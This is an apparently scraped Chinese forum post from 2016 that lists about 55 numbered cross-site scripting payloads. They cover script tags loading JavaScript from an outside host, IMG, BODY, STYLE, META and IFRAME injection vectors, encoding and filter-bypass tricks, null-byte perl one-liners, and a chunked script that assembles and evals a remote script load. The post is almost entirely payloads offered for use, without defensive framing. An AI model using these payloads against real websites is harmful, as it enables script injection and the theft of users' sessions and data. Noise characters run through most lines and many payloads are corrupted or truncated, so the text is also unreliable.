(1)普通的XSS JavaScript注入
% Z$ T5 k7 S. [3 a<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& w9 ^* o! M' p, E% d8 j& K
(99)另类弹框8 U, @' M7 k4 ], F, |$ V) V, C
<q/oncut=alert()>1, L: q) \4 f1 T k$ q$ ]# E# i1 O1 M
<s/onclick=alert()>b" [) d. h3 Z7 W% p1 a( ]! Y
<XSS=" onclick="alert(1)//">clickme</SSX=">
1 P) @* c( F* G; C K <zzz onclick=alert`1`>clickme</zzz> + B, S* @& m4 p5 `
<a onclick=alert`1`>clickme</a>2 ~; Y$ D D4 u" s# J
<a=">clickme</a=">
$ [5 ]/ [9 q3 H2 K<a=">clickme</a>
. y8 K- j& R8 K8 }2 {4 z) s<z=">clickme</z=">0 B# y$ O6 x0 t6 [9 f2 V6 J
<z onclick=alert`1`>clickme</z>
; A( M( U$ O9 u# v0 D D: {5 `/ M
" R+ H( ^3 ]' b# l* q(2)IMG标签XSS使用JavaScript命令
0 D$ @2 k J. [1 L( }<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># E5 @( q/ M2 ]
' C! r+ R$ o! A; J" }+ }% D
(3)IMG标签无分号无引号9 X, t5 f% D6 [% ~( G5 U
<IMG SRC=javascript:alert(‘XSS’)>
4 H/ {" F4 N; e* F7 i% \, s7 F7 u: ]4 p6 e
(4)IMG标签大小写不敏感8 R5 s% p5 o! c! y: N N
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>7 l0 t- O* p% e* H) t8 A; D
! F# m- B) M) j
(5)HTML编码(必须有分号)
, Y* |9 m: g3 T1 L<IMG SRC=javascript:alert(“XSS”)>
' t3 }! a$ q* Z; E$ o: @. U2 u" K; ?- q% ~% f/ ~
(6)修正缺陷IMG标签
$ q4 l- q" H3 g. }+ z, h<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
7 _( u5 P$ F, c* o" @
# m: {5 U3 ~7 v4 ?& U/ x$ F(7)formCharCode标签(计算器)
/ @1 w% J% ^) T7 O: ]<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>1 @8 M7 G+ G, F0 s& J% ` V
' b0 M* h4 }) Y& T! o) e& c$ z
(8)UTF-8的Unicode编码(计算器)
' [0 i* s" r3 e2 u<IMG SRC=jav..省略..S')>
1 w; i" b2 V+ L3 Q
, X% V# A4 }" l# A- e+ k, g. I(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
' g9 K# Y8 g- K<IMG SRC=jav..省略..S')>
' Z: M+ Z' v# X. ~. ^9 a) J# w5 w6 S! ~% ^
(10)十六进制编码也是没有分号(计算器)
8 p( E- a0 j4 Z: A0 R<IMG SRC=\'#\'" /span>; ~( M" [; l0 ]* s0 a' T
2 t; ~- O0 w$ ~" |, O( ~8 S(11)嵌入式标签,将Javascript分开
. t/ h2 O# o2 F' {5 ?/ e' }8 n<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
7 G1 T, S8 N! S, q) e
3 ^( P8 W2 g8 l8 q(12)嵌入式编码标签,将Javascript分开
1 ?6 b: d. `+ i; |: X' K0 K+ ^<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
, }% Y9 G# i5 R9 E1 q# n
- i0 y1 B, V% C7 P* Y7 k: b6 o3 J(13)嵌入式换行符1 L: k* a( y0 V0 V# k
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>1 s1 R+ |, _( z9 I8 z
6 f9 R& w2 Z5 H/ v& f(14)嵌入式回车
; Z, j5 b: T* h' _8 ^4 m F; I% D<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
" c" i) ]8 y+ R/ I
7 e0 W# j( c3 T- x+ M. n9 z X(15)嵌入式多行注入JavaScript,这是XSS极端的例子7 O) B1 t; W+ {1 T. g
<IMG SRC=\'#\'" /span>4 L4 h7 D5 h9 p* n% s* V4 @1 _
/ t$ o1 {. U5 x6 y& S(16)解决限制字符(要求同页面)% G1 b6 q* q: @) h( J
<script>z=’document.’</script>
/ t, T; \3 k; o. ] K8 _- o0 M<script>z=z+’write(“‘</script> x: N. i/ C$ m: V7 c1 B. `
<script>z=z+’<script’</script>
/ @5 I0 R. G2 d& L9 J<script>z=z+’ src=ht’</script>1 a& ]7 b" z7 h2 |
<script>z=z+’tp://ww’</script>
' [/ v' J% U" f" o, f7 |<script>z=z+’w.shell’</script>
$ V8 Q6 e9 [# Q* ~+ o9 G<script>z=z+’.net/1.’</script>
6 R% Z5 G1 x! Z0 O. b<script>z=z+’js></sc’</script>, `/ d2 N6 M$ Y9 ^' ~8 {. E9 k( H( z
<script>z=z+’ript>”)’</script>
& T/ a+ `# G/ ~<script>eval_r(z)</script>
/ r7 e3 ]' \; t2 H2 K1 v9 k- G! J) M5 V, x6 y6 M* A$ I
(17)空字符
# ?) P% P k6 {( Z D8 dperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
: C2 a _1 W5 X4 K" U$ L) p1 l) @ E
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
6 M G2 h0 V/ C2 e( P0 mperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out4 O( F% x$ S' H- ^
+ }4 [8 W* _- d. M(19)Spaces和meta前的IMG标签
1 n& O: W1 z2 H. r<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>8 F) z" B! Y, s2 h( s
. L2 l7 x0 ^6 `3 v8 T) h3 t(20)Non-alpha-non-digit XSS" b7 ?% @/ Z( R4 X8 I \: j! M
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>8 U: [$ _+ m+ z6 {8 D- M% f
! p; N: c+ S, n3 u3 |7 }
(21)Non-alpha-non-digit XSS to 2, u; O0 o4 b: t5 L1 r' m* \" c
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
$ r' y7 E& l- i& O2 Z w# B$ y; _! w# N. G
(22)Non-alpha-non-digit XSS to 33 D: f* ~* L; l+ y+ U* a
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
8 y0 r: K' C, T( N7 x
9 ~0 i2 T- r% k8 p o) b5 t(23)双开括号
4 `9 H# V O/ l1 S<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ R; B" I( O1 t% U2 ~- Y% E2 u. G" T$ v3 E9 [7 Q
(24)无结束脚本标记(仅火狐等浏览器) N$ g+ C8 B5 G# B+ ?5 Y) x
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
5 H& G2 S6 C' u$ `
5 D! D$ H, g3 C1 e(25)无结束脚本标记2
; s: Z9 C# t" U# T$ x<SCRIPT SRC=//3w.org/XSS/xss.js>/ n& x0 X+ s+ Z+ ]6 C, B
: P, m E' [; G' W' a& q4 H N
(26)半开的HTML/JavaScript XSS
8 Y; S* @8 Q3 R: s5 Z& s4 V<IMG SRC=\'#\'" /span>3 E5 M. M* z% J9 u) A" E
. c9 s: t4 @& o
(27)双开角括号6 p% v% k$ V. D+ R7 V$ l" _+ j5 V+ Q
<iframe src=http://3w.org/XSS.html <6 T- \. Q9 j0 J0 i6 q
% O- A, q8 I/ I' l7 f+ E(28)无单引号 双引号 分号4 F( Q' h9 B& W0 T: T
<SCRIPT>a=/XSS/3 m# @: q& @4 o" G6 Y+ ]# d
alert(a.source)</SCRIPT>
0 p; ]" u4 ~- ] W6 c: h3 T3 k$ q N
. r- \; E8 G# P' r& ?! J(29)换码过滤的JavaScript& I! ^8 n2 X5 `# b: S
\”;alert(‘XSS’);//
7 f; l2 M3 U% x
/ `' J5 U4 w: o(30)结束Title标签
- {9 L+ I7 F2 p1 q9 J</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 D R' f; H2 L% R0 R, m
9 y# B, `8 d. H r0 ?! h& w
(31)Input Image
+ J- Z' ~3 p+ f, |) l& B$ l" z<INPUT SRC=\'#\'" /span>
. D: B" Y2 l( }* c4 U, E2 i( ?% P' w7 {8 p: W0 I
(32)BODY Image' V, |1 f, \8 s2 J3 ~1 n
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
2 ]' @' J' _6 w# Y8 F+ u2 K# m# p1 Y6 s0 S0 n
(33)BODY标签
+ k5 H! a: n4 E- Y* T- G+ b7 i<BODY(‘XSS’)>/ b; b% n! E1 b% ~, B3 Y
! Q" M m- A$ s9 z1 ~
(34)IMG Dynsrc( g2 _1 i8 j* `% d% H2 l8 d( n0 G
<IMG DYNSRC=\'#\'" /span># K$ [$ M# K! S' |3 i
! ^8 b3 y; `! P
(35)IMG Lowsrc
: M! S' e7 |. b, q) E7 P<IMG LOWSRC=\'#\'" /span>
9 \& }% s& ~( H' a( {! n/ E* Z* E5 E5 G: X- R+ E) V/ Z) @
(36)BGSOUND
& ?" k) s+ P) F% G8 R<BGSOUND SRC=\'#\'" /span>
) k; W% T D- u+ {; _! U* u) ]0 e% p
(37)STYLE sheet
: q4 x2 e$ P1 V# {$ t5 O<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
! M! m) B. w/ H# h f) Y9 e& H
+ |# k2 w/ Z. e- b(38)远程样式表
5 x# P! C1 f$ }<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
# [/ ?1 C& I9 _$ S; |# }5 ~5 v7 D) Z3 ^/ L% f
(39)List-style-image(列表式)
# O7 z6 d$ T+ A: i* P! ?. |3 B- m7 Q<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
' n; o) X# _$ b8 G: a
8 N9 _/ P( A4 t/ U& M(40)IMG VBscript
0 L7 Q( B7 ]5 s1 W5 \, r8 }<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
. U1 G( r8 `. y. A- V6 V
( }: q5 m+ n8 e% ~5 O(41)META链接url
; s3 I) v; S+ @<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>) Z) V2 @) r c; v H w2 l
6 l3 E/ w! E7 J+ n3 j(42)Iframe8 k4 p) U0 d5 C5 J4 q- G; `
<IFRAME SRC=\'#\'" /IFRAME>
6 u& o# N$ o% M7 D/ y0 \
0 O9 P7 D3 G# _7 r* `# D5 x(43)Frame8 R4 ], d6 D# d0 O' M }
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>" ~) z9 A& ?- S& V4 k) Q
: Y1 v s: x( r(44)Table k7 c3 _* {' A! _/ Y I$ i
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 p; J5 U: B9 E! X% J6 F5 ?- ]
, }. y' O2 |3 i(45)TD5 ?0 U' O2 |' v; W* @! @
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* [) M( t: U0 w& g
9 G7 C* G1 G! I) `, L4 {(46)DIV background-image) E. n8 X" t4 {8 E
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* q/ p/ e4 c9 I1 y8 s+ w
. c t8 x$ ]( [8 j& B! D(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
0 t- b( Z! h" g& n- }( w5 l) T" o<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>4 n0 N9 v! a; \' f/ M) A9 T# Z
7 H8 a. E% K: m9 W& k* H
(48)DIV expression2 @* t' w6 r5 e- |7 Y3 B
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
7 h/ O: h' c) v) ~6 v j4 c# [7 _3 K9 A6 Y; q9 j. ]3 W9 Z
(49)STYLE属性分拆表达6 b5 J3 I o: W& X5 g
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
* E+ @. z" z( L' Y. q) O/ f& Y! k3 j) G; u: s" L
(50)匿名STYLE(组成:开角号和一个字母开头)
5 x, f% s- T9 H7 X( I. f) K8 E; r<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; k# g8 F7 m5 r7 w0 e
3 _& J e/ N ^) L* r. ?% f# U( y(51)STYLE background-image
. O m! s! l7 i% t+ R<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
' n) F/ u# y3 r+ P3 R# i! `5 A4 t' q
' O* k' _+ S2 w8 G(52)IMG STYLE方式+ O f1 @! q! B5 F. |, z, _, F
exppression(alert(“XSS”))’>. E3 F, }5 n9 B7 [
% R# ]2 P9 K5 v, R* x
(53)STYLE background
4 v1 s( r$ \3 n& _<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
; R) @6 F4 p- ?, `% ]+ L/ `" y2 J& Q! o$ O2 f
(54)BASE
, E9 S5 b" m3 [% _! i<BASE HREF=”javascript:alert(‘XSS’);//”> ~, b. p x9 n2 `, P0 I
8 Y: j' x' l. S7 H" [6 K, b* l
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS) u3 T" q6 R% O9 a m0 A
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>3 G6 {& E/ [! k5 E& H
|
发表于 2016-4-28 10:06:15
收藏
支持
反对